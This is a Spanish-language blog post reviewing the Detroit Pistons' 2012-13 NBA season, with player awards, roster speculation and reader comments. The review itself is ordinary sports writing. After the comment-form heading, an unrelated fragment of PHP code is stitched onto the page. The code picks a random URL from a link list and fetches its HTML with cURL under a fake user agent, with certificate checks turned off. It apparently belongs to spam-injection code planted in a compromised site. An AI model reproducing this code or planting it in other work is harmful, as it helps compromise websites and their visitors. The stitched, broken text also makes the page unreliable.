Detroit Pistons: Insuficiente

26 de July de 2013 por Gallis

Cuando piensas en la temporada de los Pistons, es inevitable acordarse del famoso día de la marmota. De un tiempo a esta parte todos los años son más o menos iguales: Pocas victorias, equipos anodinos con rookies prometedores… y Charlie Villanueva. Quizá este año haya tenido cierto atractivo para el público español, por el breve paso de José Manuel Calderón, pero desde hace mucho tiempo, tengo la sensación de que la gente no ve partidos de los Pistons, sino que ve a jugadores de los Pistons. En ese sentido, la temporada tampoco ha sido tan decepcionante como las 29 victorias en Regular Season podrían indicar. Ciertamente, la progresión de Greg Monroe y la explosión de Andre Drummond son muy buenas noticias para Detroit. Monroe ha confirmado las expectativas que generó la pasada temporada y se ha mantenido en sus números. Por su parte, Drummond ha conseguido ganarse poco a poco un hueco en la plantilla, convirtiéndose en una de las mayores esperanzas para el futuro de la franquicia. Habrá que ver como les sienta la llegada de Josh Smith, pero si consiguen adaptarse bien, la reconstrucción de los Pistons podría haber empezado. 

Si por dentro Detroit tiene armas más que suficientes para competir e, incluso, para mejorar el equipo vía traspaso, por fuera las apuestas han generado más dudas. Brandon Knight sigue apuntando a jugador interesante, pero su temporada ha estado marcada por una tremenda irregularidad. Aún así, ha conseguido mantener su anotación, por lo que debería seguir siendo el base titular y seguir creciendo (la llegada de Billups puede ser vital en este sentido). En quién cada vez cuesta más creer es en Rodney Stuckey. El estancamiento de su juego es evidente y este año, ni siquiera ha sido capaz de minimizarlo con su capacidad anotadora. Los 11 puntos por partido de esta temporada son su media más baja desde su año de rookie. Will Bynum ha completado un terceto de exteriores marcado por la irregularidad. De hecho, pese a su paso fugaz por Detroit, Calderón ha sido el mejor base del equipo. El extremeño, en apenas 28 partidos, dejó su sello de calidad con más de 11 puntos, un 52% en tiros de campo y casi 7 asistencias por partido. Dumars pensó en él como el jugador ideal alrededor del cual crecieran los Knight y compañía, pero Calderón ha dejado el equipo, rumbo a Dallas.

El resto de la temporada deja, quizá, la buena noticia de que Kyle Singler ha confirmado ser un jugador NBA más que decente. Las carencias del equipo le han hecho asumir más responsabilidades de las que debería, pero su rendimiento ha sido bueno. Se trata, sin duda, de un jugador de equipo que no debería tener problemas en hacer una buena carrera en la mejor liga del mundo. También fue noticia la salida de Tayshaun Prince a los Grizzlies (como parte del trade de Calderón). Hasta el regreso de Billups, este verano, era el último superviviente de aquel equipo campeón de 2004.

La enésima temporada decepcionante (la cuarta en 30 victorias o menos), le ha costado el puesto a Lawrence Frank. Su sustituto será Maurice Cheeks, exbase de los Sixers, que llega con el reto de devolver a la franquicia a los playoffs. A las armas con las que contaba Frank el año pasado hay que sumar la de Josh Smith y la del rookie Kentavious Caldwell Pope. Ensamblar todas esas piezas con las que ya hay en el equipo no será tarea fácil, aunque la ya mencionada vuelta de Billups será una ayuda. Quién sabe, el fichaje de Billups en 2002 fue el germen de los últimos Pistons campeones. Quién mejor que él para recordarles el camino.

PREMIOS

MVP: Greg Monroe. El pívot es, con solo 3 años en la liga, el líder del equipo. Sin problemas físicos, se ha consolidado cerca de las dobles figuras, con 16 puntos y 9,6 rebotes por partido. Además, da casi 4 asistencias. En su debe, los problemas defensivos, quizá por su falta de físico para ser un 5 dominante.

Rookie: Gran primer año de Andre Drummond. En apenas 20 minutos de juego ha promediado casi 8 puntos y casi 8 rebotes por partido, con un 60% en tiros de campo. Poco a poco, ha conseguido entrar en el quinteto inicial, puesto que no debería abandonar la próxima temporada. Eso sí, este verano tiene que trabajar sí o sí, el tema de los tiros libres.

Sorpresa: Por no repetirnos con Drummond, vamos a mencionar aquí a otro rookie. Tras jugar en Europa durante la temporada del Lockout, Kyle Singler llegaba a Detroit con las típicas dudas que genera casi cualquier novato. Sin embargo, y quién sabe si aprovechando su experiencia jugando a primer nivel en el viejo continente, ha respondido a la perfección. Las carencias del equipo le han hecho ser titular en 74 de los 82 partidos que ha disputado. En 28 minutos ha anotado casi 9 puntos y capturado 4 rebotes, dejando además buenos destellos en defensa. Si sigue progresando, hay jugador para rato.

Decepción: Permitidme poner 2 nombres. Por un lado, Rodney Stuckey, del que ya hemos hablado. Por otro, que Joe Dumars no haya amnistiado a Villanueva es decepcionante. No porque esa decisión hubiera cambiado el rumbo de la franquicia, sino porque hay pocos jugadores que merezcan más el castigo simbólico de la amnistía que él.

JUGANDO A GM

Creo que las líneas generales de la próxima temporada de los Pistons ya están trazadas. Con la llegada de Josh Smith, ahora es el turno de Maurice Cheeks. Si el técnico es capaz de hacer coexistir a Smith con Drummond y Monroe, los Pistons deberían conseguir algo de amenaza exterior y, a partir de ahí, dejar que el engranaje se acople. De lo contrario, será momento de buscar un traspaso con uno de los 2 interiores, teniendo en cuenta que la renovación de Monroe está próxima. Veremos que ocurre.

Por lo demás, entre Cheeks y Billups tienen el reto de convertir a Knight en un base de verdad. Si además recuperan a Stuckey para la causa, miel sobre hojuelas.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Madre mía que bien les habría venido Calde este año… lo van a echar de menos. Con él habrían sido aspirantes claros a Playoffs en el Este. Creo que han afinado muy bien eligiendo a Pope, tiene pinta de crack, pero les falta un director de nivel. Y Knight ha vuelto a decepcionar. Veremos si es capaz de destacar en este equipo. Si no los Pistons tienen un serio problema.

    Enorme resumen Gallis

      Citar

  2. rumbero dice:
    #2

    “desde hace mucho tiempo, tengo la sensación de que la gente no ve partidos de los Pistons, sino que ve a jugadores de los Pistons”

    Que gran verdad. Esta temporada debería empezar a cambiar si no mal asunto.
    Gran resumen, pero Charlie es un ídolo…cobrando un pastizal y haciéndose fotos todo el día con su mujer en el instagram. Un crack

      Citar

  3. Esteban dice:
    #3

    ya a villanueva no conviene amnistiarlo sino tenerlo a ver si se puede traspasar su expiring

    el salario de villanueva no iba a ser utilizado en otro jugador por lo que no necesitaban espacio en el tope, asi que mejor es tener y poder traspasarlo, por un buen jugador que no encaje en un reconstruccion total, como seria rondo

      Citar

  4. Esteban dice:
    #4

    si billup se encuentra medianamente bien desde lo fisico, debe ser el base titular, el escolta stuckey (ultima oportunidad) y el alero singler (hasta q pope se haga con el puesto titular de uno o de dos), con smith de 4 y monroe de 5

    y drummond hasta que este algo mas preparado para entender el juego que siga saliendo desde la banca, con Nicht de sexto hombre

    con esto, no iran muy lejos pero al menos estaran expectantes por un puesto de PO durante el año, algo es algo

    no se entiende el movimiento de smith, sobraba dinero y habia que gastarlo, pero en smith? esta bien, sera una ayuda mientras monroe logra hacer el cambio de pivot a ala pivot, y luego podria hacer un trio de rotacion con monroe y drummon (al mejor estilo wallace-wallace y okur, y luego mcdyes y luego webber en la rotacion de 3 grandes que supieron hacer los legendarios pistons)

      Citar

  5. risax mj dice:
    #5

    A mi me parece un gran equipo pero la falta de calderon la vsn s echar mucho de menos un gran equipo para calde.aunque la idea de rondo seria cojonuda.

    Gran resumen. Vomo siempre

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>